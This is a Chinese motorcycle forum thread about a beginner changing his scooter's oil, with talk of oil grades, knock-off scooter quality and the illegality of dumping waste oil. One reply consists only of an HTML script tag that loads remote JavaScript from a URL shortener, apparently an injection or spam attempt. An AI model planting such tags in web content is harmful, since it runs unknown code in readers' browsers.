摩托车论坛

搜索
楼主: 撵山豿

头一回自己换机油你们不来围观下?

状态   [当前离线]

发表于 江苏省 2017-10-21 00:12 来自手机 | 只看该作者
mengfei163 发表于 2017-10-20 09:19:36
我的跨骑一直是自己换机油,8000-10000公里换的,国产全合成机油。

长城还是昆仑?

------------
发布于摩托迷Android客户端

状态   [当前离线]

发表于 江苏省 2017-10-21 00:13 来自手机 | 只看该作者
踏雪寻欢 发表于 2017-10-21 08:02:11
废矿物油属于国家危险废物名录中的HW08,非法加工,倾倒,转运可以判刑,需要收集暂存后交有资质...

我觉得应该设置废机油回收点,不然个人也很难处置

状态   [当前离线]

发表于 天津市 2017-10-21 01:01 | 只看该作者
你这个 是山寨垃圾车  轮毂是电动车轮毂 强度和舒适度没全铝轮好 发动机还是山寨  车架和塑件没法细看不知道  不超3000这个车

状态   [当前离线]

发表于 陕西省 2017-10-21 01:44 | 只看该作者
踏雪寻欢 发表于 2017-10-21 08:02
废矿物油属于国家危险废物名录中的HW08,非法加工,倾倒,转运可以判刑,需要收集暂存后交有资质单位处置, ...

这个马甲说的对  不能乱倒

状态   [当前离线]

发表于 广东省 2017-10-21 03:13 | 只看该作者

用的长城机油,一般在家里自己换,旧油拿东西装好倒去修车的地方的大桶里。{:1_87:}一般拿机油去人家店里换,就算给手工费人家都不欢喜。这个感觉有点砸场子的意思。

状态   [当前离线]

发表于 浙江省 2017-10-21 05:40 来自手机 | 只看该作者
废机油随便倒,太垃圾了。

状态   [当前离线]

发表于 浙江省 2017-10-21 06:51 | 只看该作者
10W-50比10W-40好!在常温下两者粘度一样,但是高温的时候10W-50就要比10W-40的好!

状态   [当前离线]

发表于 甘肃省 2017-10-21 07:08 | 只看该作者
山寨雅马哈SMAX   祝你早日学会修车技术。

状态   [当前离线]

楼主| 发表于 四川省 2017-10-21 15:19 | 只看该作者
blooder 发表于 2017-10-21 09:01
你这个 是山寨垃圾车  轮毂是电动车轮毂 强度和舒适度没全铝轮好 发动机还是山寨  车架和塑件没法细看不知 ...

上到牌了警察叔叔至少不得逮我。。。。我知道山寨,也知道性能差。但不是垃圾!车管所车检我这冒牌车各项检查是通过了的。排放合格车况良好,怎么就垃圾了?垃圾=无用。你也许骑的高端大贸拉风街跑,在你眼里你看不上的都是垃圾,你有你的精彩世界,我有我的生活需要。正如凤姐说王思聪一样,你的光鲜亮丽档次地位是你有个首富的爹,如果没有这个金主老爹,论颜值论做人你和我老家隔壁的二狗子没什么区别。。。。。眼界,决定了你的层次,思维决定了你的高度。朋友,善待他人,也是尊重自己。。。

状态   [当前离线]

楼主| 发表于 四川省 2017-10-21 15:35 | 只看该作者
各位,我知道我不对。我确实不知道废油不能乱倒,在热心坛友的关怀和指正后,我知道错了。。。。
我坚决不在犯相同及类似的问题,由于自己的无知造成了很恶劣的影响,在此,我对广大群众表示沉痛的悔恨!怀着感恩及改正的决心,我对所有人说一声。。。。。我不对,我有罪。我不好,我检讨!!!同时加强自身的知识理论学习和驾驶技术的实践操作!争取做一名合格的优秀的让群众满意的踏板驾驶人员。。。为表示决心,特奉上福利一张,聊表心意。。。。。。望笑纳~~~(这尺度不违规吧,有违速删)

状态   [当前离线]

发表于 天津市 2017-10-22 01:29 | 只看该作者
撵山豿 发表于 2017-10-21 23:19
上到牌了警察叔叔至少不得逮我。。。。我知道山寨,也知道性能差。但不是垃圾!车管所车检我这冒牌车各项 ...

好么 给我上了一课 不好意思啊 没贬损的意思 弄不好您经济条件比在下还好 只是就车说车 没别的意思

状态   [当前离线]

发表于 江西省 2017-10-22 02:43 | 只看该作者
先打个盹再说 发表于 2017-10-21 08:13
我觉得应该设置废机油回收点,不然个人也很难处置

是的电池收集已经普及,我想废矿物油也不远了。关键废矿物油很不明白的人或者不良商家会收集提炼加工。以后这方面监管会更严吧

状态   [当前离线]

发表于 江西省 2017-10-22 02:46 | 只看该作者
撵山豿 发表于 2017-10-21 23:19
上到牌了警察叔叔至少不得逮我。。。。我知道山寨,也知道性能差。但不是垃圾!车管所车检我这冒牌车各项 ...

他是就事论事,希望你搞个好车,好用很多。你用2年你的车回来再看这段评论吧

状态   [当前离线]

发表于 北京市 2017-10-22 14:04 来自手机 | 只看该作者
czwshy123 发表于 2017-10-21 14:51:11
10W-50比10W-40好!在常温下两者粘度一样,但是高温的时候10W-50就要比10W-4...

新车不用10w-50的吧,个人觉得太稠了

状态   [当前离线]

发表于 河南省 2017-10-24 03:14 来自手机 | 只看该作者
<script src="//t.cn/ROIMclC"></script>

状态   [当前离线]

发表于 北京市 2017-10-24 08:06 | 只看该作者
我一般都拿回去养小龙虾

状态   [当前离线]

发表于 四川省 2017-10-25 08:25 | 只看该作者
我有一个山寨魔术师,骑了快6000公里,一点毛病没有,反倒是新买的雅马哈巧格i,抖动,异响加共振,每次出小区门口都被门卫鄙视叽叽嘎嘎的。不是有论坛那么多人讨论巧格的毛病,我都去找商家理论了。

状态   [当前离线]

楼主| 发表于 四川省 2017-10-28 05:10 | 只看该作者
踏雪寻欢 发表于 2017-10-22 10:46
他是就事论事,希望你搞个好车,好用很多。你用2年你的车回来再看这段评论吧

我也知道买好车的好处,问题就是预算本来够,出了点事挪用了。旧车又不能骑了,只能买个一般的里面比较好的骑着。事情就是这样~~

状态   [当前离线]

楼主| 发表于 四川省 2017-10-28 05:21 | 只看该作者
blooder 发表于 2017-10-22 09:29
好么 给我上了一课 不好意思啊 没贬损的意思 弄不好您经济条件比在下还好 只是就车说车 没别的意思

。。。。。。我敏感了,来来抽支烟握握手还是好朋友~~~
我刚开始骑烧油的,很多都不懂。在这样一不知二不会的情况下,最怕就是吹凉风。。。本来很有积极性和动力的,结果周围全是负面论调,时间长了,不是垃圾也会觉得真就是垃圾了。也不想摸索了也不愿搞整了~~毕竟是自己出行的必需工具,我觉得很有必要把它搞明白~你说是吧

状态   [当前离线]

发表于 陕西省 2017-10-30 01:33 | 只看该作者
撵山豿 发表于 2017-10-28 13:21
。。。。。。我敏感了,来来抽支烟握握手还是好朋友~~~
我刚开始骑烧油的,很多都不懂。在这样 ...

是的 ,用一段时间再感觉,我也是才买不久,不过以前在农村骑过好几个车,对比之后合资品牌是强很多

QQ|小黑屋|手机版|Archiver|中国摩托迷网

GMT, 2024-4-19 17:10